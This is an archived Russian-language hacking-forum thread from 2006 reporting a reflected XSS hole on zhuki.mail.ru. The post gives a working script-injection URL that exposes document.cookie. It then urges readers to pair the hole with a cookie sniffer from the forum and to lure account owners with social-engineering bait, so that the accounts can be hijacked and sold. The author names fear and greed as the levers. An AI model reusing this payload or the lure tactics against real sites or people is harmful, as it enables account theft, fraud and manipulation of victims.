ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Пассивная XSS на zhuki.mail.ru
  #1  
Старый 11.10.2006, 22:54
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию Пассивная XSS на zhuki.mail.ru

При нормальных навыках в соц. инженерии можно угнать пару неплохих аккаунтов, а потом, например, продать:

POST: _http://zhuki.mail.ru/info/lib/index.php?=&page=2%22%3E%3Cscript%3Ealert(document .cookie);%3C/script%3E


Реализация проста - ищете на форуме код для вставки ссылки на обычный снифер, а потом впариваете ссылку владельцу аккаунта. Например, чувак - это твоего жука так лоханули/так поднялся/заблокировали.

Основные факторы соц. инженерии - человеческие слабости, страх, жадность и т. п.
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
IE XSS Kit .Slip Чаты 22 23.10.2006 06:45
XSS worms Xex Статьи 0 02.10.2006 01:49
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ